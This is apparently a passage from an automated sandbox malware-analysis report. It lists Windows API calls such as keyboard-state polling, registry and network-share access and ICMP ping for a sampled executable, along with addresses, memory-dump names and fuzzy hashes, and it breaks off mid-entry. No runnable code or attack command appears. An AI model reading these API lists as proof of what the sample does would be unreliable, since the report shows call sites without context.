                                                                • Opcode Fuzzy Hash: 6d6cc309248cf78872c0e4499fbd14f1886cceb70334834f2d1a0bc7b35b3088
                                                                • Instruction Fuzzy Hash: 3231B471A40119BBDB21ABA4DC49FEF37BCEF89B00F1040B5F505D6151EB7897458B24
                                                                APIs
                                                                • timeGetTime.WINMM ref: 0077E6B4
                                                                  • Part of subcall function 0072E551: timeGetTime.WINMM(?,?,0077E6D4), ref: 0072E555
                                                                • Sleep.KERNEL32(0000000A), ref: 0077E6E1
                                                                • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0077E705
                                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0077E727
                                                                • SetActiveWindow.USER32 ref: 0077E746
                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0077E754
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 0077E773
                                                                • Sleep.KERNEL32(000000FA), ref: 0077E77E
                                                                • IsWindow.USER32 ref: 0077E78A
                                                                • EndDialog.USER32(00000000), ref: 0077E79B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                • String ID: BUTTON
                                                                • API String ID: 1194449130-3405671355
                                                                • Opcode ID: 993587705f88a52d6687f4e800783f540a6df186af052a5903f9bfcd1c07ed30
                                                                • Instruction ID: 74d56d9d27ecbd12462fe3f6c4273f3e61cd924b960b7103ff96781692dbb6a9
                                                                • Opcode Fuzzy Hash: 993587705f88a52d6687f4e800783f540a6df186af052a5903f9bfcd1c07ed30
                                                                • Instruction Fuzzy Hash: BF2184B0301245BFEF015F24ECC9A253B6DF79D389B10C465F509C55A2DBBDAC119A6C
                                                                APIs
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0077EA5D
                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0077EA73
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0077EA84
                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0077EA96
                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0077EAA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: SendString$_wcslen
                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                • API String ID: 2420728520-1007645807
                                                                • Opcode ID: dc8b0c8c958da0494d2b12b2e5bd4c4159c3bf0a763ddeca7c3fcac0121e50cf
                                                                • Instruction ID: 342595b667d5a48f4992cdaad74addaccd65374cbdfddc172ce18fd6857fed3b
                                                                • Opcode Fuzzy Hash: dc8b0c8c958da0494d2b12b2e5bd4c4159c3bf0a763ddeca7c3fcac0121e50cf
                                                                • Instruction Fuzzy Hash: 5711C671A50219B9DB20A7A5DC5ADFF6B7CEBD5F40F00442AB815A20D0EE782E45C5B0
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000001), ref: 00775CE2
                                                                • GetWindowRect.USER32(00000000,?), ref: 00775CFB
                                                                • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00775D59
                                                                • GetDlgItem.USER32(?,00000002), ref: 00775D69
                                                                • GetWindowRect.USER32(00000000,?), ref: 00775D7B
                                                                • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00775DCF
                                                                • GetDlgItem.USER32(?,000003E9), ref: 00775DDD
                                                                • GetWindowRect.USER32(00000000,?), ref: 00775DEF
                                                                • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00775E31
                                                                • GetDlgItem.USER32(?,000003EA), ref: 00775E44
                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00775E5A
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00775E67
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                • String ID:
                                                                • API String ID: 3096461208-0
                                                                • Opcode ID: 5f1c3069313b18bd95384a4c04f19d248a823568df520585c285669abc4b9338
                                                                • Instruction ID: da4c34ed71b9b7bcdc6e471035cfdaacab6c5b67fef080ffd939503cc2cb7dac
                                                                • Opcode Fuzzy Hash: 5f1c3069313b18bd95384a4c04f19d248a823568df520585c285669abc4b9338
                                                                • Instruction Fuzzy Hash: 0B510E71B00605AFDF19CF68DD89AAEBBB5FB88340F148229F519E7290D7B49E04CB50
                                                                APIs
                                                                  • Part of subcall function 00728F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00728BE8,?,00000000,?,?,?,?,00728BBA,00000000,?), ref: 00728FC5
                                                                • DestroyWindow.USER32(?), ref: 00728C81
                                                                • KillTimer.USER32(00000000,?,?,?,?,00728BBA,00000000,?), ref: 00728D1B
                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 00766973
                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00728BBA,00000000,?), ref: 007669A1
                                                                • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00728BBA,00000000,?), ref: 007669B8
                                                                • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00728BBA,00000000), ref: 007669D4
                                                                • DeleteObject.GDI32(00000000), ref: 007669E6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                • String ID:
                                                                • API String ID: 641708696-0
                                                                • Opcode ID: 15edd979b51235ebf9f8e73cddcc28a73998165aeb65717879ac996720e6f53a
                                                                • Instruction ID: 806e62fe21244b42d05081aaeb0594f06c8dc144e0111865dc50edfa3495d1ff
                                                                • Opcode Fuzzy Hash: 15edd979b51235ebf9f8e73cddcc28a73998165aeb65717879ac996720e6f53a
                                                                • Instruction Fuzzy Hash: A161BD30103760DFCB629F14EA49B2A77F1FB44312F95855CE4429A560CB3EB880CFA6
                                                                APIs
                                                                  • Part of subcall function 00729944: GetWindowLongW.USER32(?,000000EB), ref: 00729952
                                                                • GetSysColor.USER32(0000000F), ref: 00729862
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ColorLongWindow
                                                                • String ID:
                                                                • API String ID: 259745315-0
                                                                • Opcode ID: 7835aafe431d30363b66c9f02048d9d1181407f626babc299413983b7dd7cf54
                                                                • Instruction ID: 4d9f738a6cf78cea092895015859589f94ba7e4d424af10846e6d1ea95ffe4e4
                                                                • Opcode Fuzzy Hash: 7835aafe431d30363b66c9f02048d9d1181407f626babc299413983b7dd7cf54
                                                                • Instruction Fuzzy Hash: 0841D471500654AFDB255F38EC88BB93BA5EB57370F1C8645FAA28B1E2D7389C41DB10
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .s
                                                                • API String ID: 0-1621786184
                                                                • Opcode ID: 0a2c03f8e5a15180aabee92d8c4f41024f92b0465e446c58626dab10440bef17
                                                                • Instruction ID: 5f24f82084dc2d8cb25200c8417c9dc9588f06d112c06876d3b777f25eb0c7f8
                                                                • Opcode Fuzzy Hash: 0a2c03f8e5a15180aabee92d8c4f41024f92b0465e446c58626dab10440bef17
                                                                • Instruction Fuzzy Hash: ACC1E475E0424AEFDF11DFA8D845BAEBBB0BF09310F144199F514AB3A2C7789941CB61
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0075F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00779717
                                                                • LoadStringW.USER32(00000000,?,0075F7F8,00000001), ref: 00779720
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0075F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00779742
                                                                • LoadStringW.USER32(00000000,?,0075F7F8,00000001), ref: 00779745
                                                                • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00779866
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModuleString$Message_wcslen
                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                • API String ID: 747408836-2268648507
                                                                • Opcode ID: 53df448b6230e8fa5c7944394f7e5b2b8c5b892f940bb2cdb95bf672764ae247
                                                                • Instruction ID: e1d34adf31fc0a5483b78541497c1a408c562206105c159e49f974ee0ea1b5df
                                                                • Opcode Fuzzy Hash: 53df448b6230e8fa5c7944394f7e5b2b8c5b892f940bb2cdb95bf672764ae247
                                                                • Instruction Fuzzy Hash: CB412C72801219EADF04EBE4DE9ADEEB778AF55340F504025F60572092EB396F89CB61
                                                                APIs
                                                                  • Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A
                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007707A2
                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007707BE
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007707DA
                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00770804
                                                                • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0077082C
                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00770837
                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0077083C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                • API String ID: 323675364-22481851
                                                                • Opcode ID: 1730bb1184b533f6b04555e74676e42127a24534818df67221bcaf3ccb084bc8
                                                                • Instruction ID: 3e84a2599c5ce989d04024ff7d96e5a74f2fff3331168affcda1f7820dc8f4d1
                                                                • Opcode Fuzzy Hash: 1730bb1184b533f6b04555e74676e42127a24534818df67221bcaf3ccb084bc8
                                                                • Instruction Fuzzy Hash: EC41FC71C10229EBDF15EB94DC99CEDB778FF44350F148126E915A31A1EB386E44CB90
                                                                APIs
                                                                • VariantInit.OLEAUT32(?), ref: 00793C5C
                                                                • CoInitialize.OLE32(00000000), ref: 00793C8A
                                                                • CoUninitialize.OLE32 ref: 00793C94
                                                                • _wcslen.LIBCMT ref: 00793D2D
                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00793DB1
                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00793ED5
                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00793F0E
                                                                • CoGetObject.OLE32(?,00000000,007AFB98,?), ref: 00793F2D
                                                                • SetErrorMode.KERNEL32(00000000), ref: 00793F40
                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00793FC4
                                                                • VariantClear.OLEAUT32(?), ref: 00793FD8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                • String ID:
                                                                • API String ID: 429561992-0
                                                                • Opcode ID: 45d4dca5080aab846e6abb0d921ded7caf8036c5df244bf06cd3a8cda3faedc7
                                                                • Instruction ID: 12d05e6351322a7470e843501cedb6a979c10bda55cf6e0147376642a274fcea
                                                                • Opcode Fuzzy Hash: 45d4dca5080aab846e6abb0d921ded7caf8036c5df244bf06cd3a8cda3faedc7
                                                                • Instruction Fuzzy Hash: 16C13571608205EFDB00DF68D88492BBBE9FF89744F04491DF98A9B250D738EE45CB52
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 00787AF3
                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00787B8F
                                                                • SHGetDesktopFolder.SHELL32(?), ref: 00787BA3
                                                                • CoCreateInstance.OLE32(007AFD08,00000000,00000001,007D6E6C,?), ref: 00787BEF
                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00787C74
                                                                • CoTaskMemFree.OLE32(?,?), ref: 00787CCC
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00787D57
                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00787D7A
                                                                • CoTaskMemFree.OLE32(00000000), ref: 00787D81
                                                                • CoTaskMemFree.OLE32(00000000), ref: 00787DD6
                                                                • CoUninitialize.OLE32 ref: 00787DDC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                • String ID:
                                                                • API String ID: 2762341140-0
                                                                • Opcode ID: a23a7c6704f68bebfc1bdaf45afa275b1a2e55ee0e25e6fa98f5d3e39db45f4c
                                                                • Instruction ID: a1ea3237c0ce135112af93e70a82eea2a6065efbe5b2ddffa36e4a590da1865b
                                                                • Opcode Fuzzy Hash: a23a7c6704f68bebfc1bdaf45afa275b1a2e55ee0e25e6fa98f5d3e39db45f4c
                                                                • Instruction Fuzzy Hash: 10C11B75A04109EFCB14DFA4C888DAEBBF9FF48314B148499E91A9B361D734ED81CB90
                                                                APIs
                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007A5504
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A5515
                                                                • CharNextW.USER32(00000158), ref: 007A5544
                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007A5585
                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007A559B
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007A55AC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CharNext
                                                                • String ID:
                                                                • API String ID: 1350042424-0
                                                                • Opcode ID: 0b6edd0e069b134ccdcdce7c63c734ddeedf1cd7903ccfcde53a9210ac6c03fa
                                                                • Instruction ID: de204444eb45672ebab9863bf6542c4133ebe5d19e1a20031217fc2dac6980d3
                                                                • Opcode Fuzzy Hash: 0b6edd0e069b134ccdcdce7c63c734ddeedf1cd7903ccfcde53a9210ac6c03fa
                                                                • Instruction Fuzzy Hash: C2619D31900608EFDF11CF54CC84DFE7BB9EB8B721F108245F925AA290D7789A80DB60
                                                                APIs
                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0076FAAF
                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 0076FB08
                                                                • VariantInit.OLEAUT32(?), ref: 0076FB1A
                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 0076FB3A
                                                                • VariantCopy.OLEAUT32(?,?), ref: 0076FB8D
                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 0076FBA1
                                                                • VariantClear.OLEAUT32(?), ref: 0076FBB6
                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 0076FBC3
                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0076FBCC
                                                                • VariantClear.OLEAUT32(?), ref: 0076FBDE
                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0076FBE9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                • String ID:
                                                                • API String ID: 2706829360-0
                                                                • Opcode ID: a51e3726dbcff2d934ad68cc285ea7fba784dcabe92c3cb215bfba4dedb9a95a
                                                                • Instruction ID: cfc1656868a028d2709063e0e973b9c691d4aaca8aa68b7edbf421f72d861bd1
                                                                • Opcode Fuzzy Hash: a51e3726dbcff2d934ad68cc285ea7fba784dcabe92c3cb215bfba4dedb9a95a
                                                                • Instruction Fuzzy Hash: E3415475900119EFCB01DF68D8589ADBFB9FF49354F00C065E906A7251CB38A945CF94
                                                                APIs
                                                                • GetKeyboardState.USER32(?), ref: 00779CA1
                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00779D22
                                                                • GetKeyState.USER32(000000A0), ref: 00779D3D
                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00779D57
                                                                • GetKeyState.USER32(000000A1), ref: 00779D6C
                                                                • GetAsyncKeyState.USER32(00000011), ref: 00779D84
                                                                • GetKeyState.USER32(00000011), ref: 00779D96
                                                                • GetAsyncKeyState.USER32(00000012), ref: 00779DAE
                                                                • GetKeyState.USER32(00000012), ref: 00779DC0
                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00779DD8
                                                                • GetKeyState.USER32(0000005B), ref: 00779DEA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: State$Async$Keyboard
                                                                • String ID:
                                                                • API String ID: 541375521-0
                                                                • Opcode ID: d88205d8b2a43ea41832cba4dae28516970f65b1467d1d29d8b1aaa19f112197
                                                                • Instruction ID: a34b9af03e56ca108fcf7fd684ac3f68c4a5163906ba4c6e4a1b0f753623f224
                                                                • Opcode Fuzzy Hash: d88205d8b2a43ea41832cba4dae28516970f65b1467d1d29d8b1aaa19f112197
                                                                • Instruction Fuzzy Hash: 8A41EB346057C96DFF31877484043B5BEA06F12384F08C05ADBCA566C2EBEC99D4C7A2
                                                                APIs
                                                                • WSAStartup.WSOCK32(00000101,?), ref: 007905BC
                                                                • inet_addr.WSOCK32(?), ref: 0079061C
                                                                • gethostbyname.WSOCK32(?), ref: 00790628
                                                                • IcmpCreateFile.IPHLPAPI ref: 00790636
                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007906C6
                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007906E5
                                                                • IcmpCloseHandle.IPHLPAPI(?), ref: 007907B9
                                                                • WSACleanup.WSOCK32 ref: 007907BF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                • String ID: Ping
                                                                • API String ID: 1028309954-2246546115
                                                                • Opcode ID: 562b6d4b6aba06a7147fa4c05cd4b1a056142e7f9b8d05a8403390e0b6e74c38
                                                                • Instruction ID: ec90d4ccca555170b95abd6d23679d94407de49c2155d58e49524ca47fcbaed3
